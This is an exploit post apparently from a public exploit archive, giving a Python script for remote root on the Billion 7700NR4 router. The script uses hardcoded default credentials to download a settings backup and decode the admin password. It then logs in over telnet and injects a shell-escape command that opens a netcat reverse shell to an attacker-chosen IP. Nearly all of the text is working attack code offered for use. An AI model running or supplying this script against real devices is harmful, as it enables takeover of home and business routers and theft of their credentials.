Billion Router 7700NR4 Remote Root Command Execution
Posted on 07 October 2016
# Title : Billion Router 7700NR4 Remote Root Command Execution # Date : 06/10/2016 # Author : R-73eN # Tested on: Billion Router 7700NR4 # Vendor : http://www.billion.com/ # Vulnerability Description: # This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users. # The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these # credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password. # Using that password we can login to telnet server and use a shell escape to get a reverse root connection. # You must change host with the target and reverse_ip with your attacking ip. # Fix: # The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. # import requests import base64 import socket import time host = "" def_user = "user" def_pass = "user" reverse_ip = "" #Banner banner = "" banner +=" ___ __ ____ _ _ " banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / | | " banner +=" | || '_ | |_ / _ | | _ / _ '_ / _ | | " banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ | |___ " banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____| " print banner # limited shell escape evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &' def execute_payload(password): print "[+] Please run nc -lvp 1337 and then press any key [+]" raw_input() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,23)) s.recv(1024) s.send("admin ") a= s.recv(1024) time.sleep(1) s.send(password +" ") time.sleep(1) s.recv(1024) s.send(evil + " ") time.sleep(1) print "[+] If everything worked you should get a reverse shell [+]" print "[+] Warning pressing any key will close the SHELL [+]" raw_input() r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass)) if(r.status_code == 200): print "[+] Seems the exploit worked [+]" print "[+] Dumping data . . . [+]" temp = r.text admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0] # print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]" execute_payload(str(base64.b64decode(admin_pass))) else: print "[-] Exploit Failed [-]" print " [+] https://www.infogen.al/ [+] "